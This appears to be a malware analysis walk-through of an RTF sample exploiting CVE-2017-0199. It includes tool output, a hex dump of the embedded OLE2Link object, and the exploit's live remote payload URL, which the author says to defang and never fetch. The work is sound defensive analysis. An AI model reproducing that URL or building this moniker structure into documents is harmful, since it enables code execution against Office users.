
CVE-2017-0199

Walk-through of an in-the-wild RTF sample exploiting CVE-2017-0199, the Microsoft Office / WordPad OLE2Link remote-document handler bug. The RTF carries a single embedded OLE object of class `OLE2Link` (see the rtfobj listing below); the extracted OLE stream contains a URL Moniker — CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, visible little-endian at offset 0x818 of the dumped object, followed by the link length and the UTF-16LE target — pointing at http://hyoeyeep.ws/template.doc. Office resolves that link when the document is opened and dispatches the fetched content by its server-supplied Content-Type (the HTA handler abuse described in references 4 and 8), so no macros are involved. Two practical notes: plain `strings` misses the URL because it is UTF-16LE (use `strings -el`, or floss as shown), and the URL is a live malware indicator — defang it in reports and never fetch it from an analysis host.

root@sh:~/cve-2017-0199# file ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin: Rich Text Format data, version 1, unknown character set

root@sh:~/cve-2017-0199# xxd ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin | head -3
00000000: 7b5c 7274 6631 5c61 6465 666c 616e 6731  {\rtf1\adeflang1
00000010: 3032 355c 616e 7369 5c61 6e73 6963 7067  025\ansi\ansicpg
00000020: 3132 3532 5c75 6331 5c61 6465 6666 305c  1252\uc1\adeff0\
root@sh:~/cve-2017-0199# rtfobj ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin' - size: 37519 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00003181h |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
root@sh:~/cve-2017-0199# rtfobj -s 0 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin' - size: 37519 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00003181h |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'OLE2Link'
  data size  = 2560
  saving to file ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
root@sh:~/cve-2017-0199# xxd ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
00000000: d0cf 11e0 a1b1 1ae1 0000 0000 0000 0000  ................
00000010: 0000 0000 0000 0000 3e00 0300 feff 0900  ........>.......
00000020: 0600 0000 0000 0000 0000 0000 0100 0000  ................
00000030: 0100 0000 0000 0000 0010 0000 0200 0000  ................
00000040: 0100 0000 feff ffff 0000 0000 0000 0000  ................
00000050: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000060: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000100: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000110: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000120: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000130: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000140: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000150: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000160: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000170: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000180: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000190: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000001f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000200: fdff ffff feff ffff feff ffff feff ffff  ................
00000210: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000220: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000230: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000240: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000250: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000260: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000270: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000280: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000290: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000002f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000300: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000310: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000320: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000330: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000340: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000350: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000360: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000370: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000380: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000390: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000003f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000400: 5200 6f00 6f00 7400 2000 4500 6e00 7400  R.o.o.t. .E.n.t.
00000410: 7200 7900 0000 0000 0000 0000 0000 0000  r.y.............
00000420: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000430: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000440: 1600 0500 ffff ffff ffff ffff 0100 0000  ................
00000450: 0003 0000 0000 0000 c000 0000 0000 0046  ...............F
00000460: 0000 0000 0000 0000 0000 0000 104e ab9b  .............N..
00000470: 4249 d201 0300 0000 0002 0000 0000 0000  BI..............
00000480: 0100 4f00 6c00 6500 0000 0000 0000 0000  ..O.l.e.........
00000490: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004c0: 0a00 0201 ffff ffff 0200 0000 ffff ffff  ................
000004d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004f0: 0000 0000 0000 0000 a801 0000 0000 0000  ................
00000500: 0300 4f00 6200 6a00 4900 6e00 6600 6f00  ..O.b.j.I.n.f.o.
00000510: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000520: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000530: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000540: 1200 0200 ffff ffff ffff ffff ffff ffff  ................
00000550: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000560: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000570: 0000 0000 0700 0000 0600 0000 0000 0000  ................
00000580: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000005a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000005b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000005c0: 0000 0000 ffff ffff ffff ffff ffff ffff  ................
000005d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000005e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000005f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000600: 0100 0000 0200 0000 0300 0000 0400 0000  ................
00000610: 0500 0000 0600 0000 feff ffff feff ffff  ................
00000620: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000630: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000640: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000650: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000660: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000670: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000680: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000690: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000006f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000700: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000710: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000720: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000730: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000740: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000750: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000760: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000770: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000780: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000790: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007c0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000007f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000800: 0100 0002 0900 0000 0100 0000 0000 0000  ................
00000810: 0000 0000 0000 0000 5c01 0000 e0c9 ea79  ........\......y
00000820: f9ba ce11 8c82 00aa 004b a90b 4401 0000  .........K..D...
00000830: 6800 7400 7400 7000 3a00 2f00 2f00 6800  h.t.t.p.:././.h.
00000840: 7900 6f00 6500 7900 6500 6500 7000 2e00  y.o.e.y.e.e.p...
00000850: 7700 7300 2f00 7400 6500 6d00 7000 6c00  w.s./.t.e.m.p.l.
00000860: 6100 7400 6500 2e00 6400 6f00 6300 0000  a.t.e...d.o.c...
00000870: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000880: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000890: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000008f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000900: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000910: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000920: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000930: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000940: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000950: 0000 0000 0000 0000 0000 0000 7958 81f4  ............yX..
00000960: 3b1d 7f48 af2c 825d c485 2763 0000 0000  ;..H.,.]..'c....
00000970: a5ab 0000 ffff ffff 2069 3325 f903 cf11  ........ i3%....
00000980: 8fd0 00aa 0068 6f13 0000 0000 ffff ffff  .....ho.........
00000990: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000009a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000009b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000009c0: 1000 0300 0400 0000 0000 0000 0000 0000  ................
000009d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000009e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000009f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
root@sh:~/cve-2017-0199# strings ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
 i3%
root@sh:~/cve-2017-0199# ->> floss -q ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
 i3%
Root Entry
ObjInfo
http://hyoeyeep.ws/template.doc
ERROR:floss:FLOSS currently supports the following formats for string decoding and stackstrings: PE
You can analyze shellcode using the -s switch. See the help (-h) for more information.

References

  1. https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
  2. https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
  3. https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
  4. https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
  5. https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
  6. https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
  7. https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
  8. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
  9. https://www.microsoft.com/en-us/download/details.aspx?id=7105
  10. https://www.microsoft.com/en-us/download/details.aspx?id=10725
  11. rapid7/metasploit-framework#8220
  12. rapid7/metasploit-framework#8254
  13. http://justhaifei1.blogspot.jp/2017/07/bypassing-microsofts-cve-2017-0199-patch.html